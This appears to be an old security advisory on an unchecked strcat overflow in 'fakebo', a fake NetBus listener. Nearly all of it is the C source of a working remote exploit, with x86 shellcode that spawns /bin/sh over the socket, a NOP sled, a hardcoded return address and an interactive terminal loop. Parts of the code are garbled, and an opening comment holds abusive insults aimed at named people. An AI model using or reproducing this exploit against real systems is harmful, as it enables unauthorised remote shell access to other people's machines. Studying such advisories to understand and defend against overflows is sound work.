COMMAND

    fakebo

SYSTEMS AFFECTED

    It would be really silly if yours

PROBLEM

    Groovy Pants Gus  found following.   Just your standard  smash the
    stack  buffer  overflow,  fakebo  has  an unchecked strcat in it's
    netbus handling code, allowing for remote code execution.

    /*

    Hi Myn, hope  you get hit  by a bus  driven by a  postal worker on
    crack.. you too, mindrape.. fuck you

    */

    #define ADDR 0xBFFFE258 /* Return address, YMMV */

    #include 
    #include 
    #include 
    #include 


    #include 

    #include 

    #include 
    #include 
    #include 
    #include 

    #include 

    /* stolen from qpush */
    void terminal(int s) {
      char buf[1024];
      fd_set rfds;
      fd_set fds;
      int i;

      for (i=0;ih_addr;
	else {
	  printf("Unable to resolve %s!\n", host);
	  exit(1);
	}
      }
      return rc;
    }


    char overflow[] = { /* Ok, it's not the neatest, deal with it */
    #ifdef DEBUG
    0xCC,                           /* int 03h */
    #endif
    0xEB, 53,                       /* jmp forward */
				    /* backwards: */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x33, 0xDB,                     /* xor ebx, ebx */
    0x33, 0xC9,                     /* xor ecx, ecx */
    0x80, 0xC3, 0x05,               /* add bl, 05h */
    0xCD, 0x80,                     /* int 80h */
   
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x5B,                           /* pop ebx */
    0x58,                           /* pop eax */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x0B,                     /* add al, 0Bh */

    0x33, 0xD2,                     /* xor edx, edx */
    0x52,                           /* push edx */
    0x8B, 0xCB,                     /* mov ecx, edx */
    0x83, 0xC1, 0x07,               /* add ecx, 07h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x83, 0xC1, 0x03,               /* add ecx, 03h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x49,                           /* dec ecx */
    0x49,                           /* dec ecx */
    0x51,                           /* push ecx */
    0x8B, 0xCC,                     /* mov ecx, esp */
    0xCD, 0x80,                     /* int 80h */
				    /* forward:*/
    0xE8, 0xC4, 0xFF, 0xFF, 0xFF,   /* call backward */
    /* data */
    0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68,       /* "/bin/sh" */
    0x01,                                           /* 0x01 */
    0x73, 0x68,                                     /* "sh" */
    0x01                                            /* 0x01 */
    };

    int port = 12345;

    void main (int argc, char **argv) {
      int i, rc;
      char buf[2048];
      struct sockaddr_in sin;
      char *s;
      int sock;

      if (argc != 2) {
	printf("Usage: %s \n", argv[0]);
	exit(0);
      }
      s = strchr(argv[1], ':');
      if (s) {
	*s=0;
	port = atoi(s+1);
      }

      sin.sin_port = htons(port);
      sin.sin_addr.s_addr = resolve(argv[1]);
      sin.sin_family = AF_INET;

      sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (sock == -1) {
	perror("socket()");
	exit(0);
      }

      rc = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
      if (rc == -1) {
	perror("connect()");
	exit(0);
      }

      for (i=0;i<1500;i++)
	buf[i]=0x90;

      memcpy(&buf[999-sizeof(overflow)], overflow, sizeof(overflow));

      buf[999]=ADDR & 0xFF;
      buf[1000]=(ADDR >> 8) & 0xFF;
      buf[1001]=(ADDR >> 16) & 0xFF;
      buf[1002]=(ADDR >> 24) & 0xFF;
      buf[1003]='\n';

      send(sock, buf, 1003, 0);
 
      terminal(sock);
      exit(0);
    }

SOLUTION

    Nothing yet.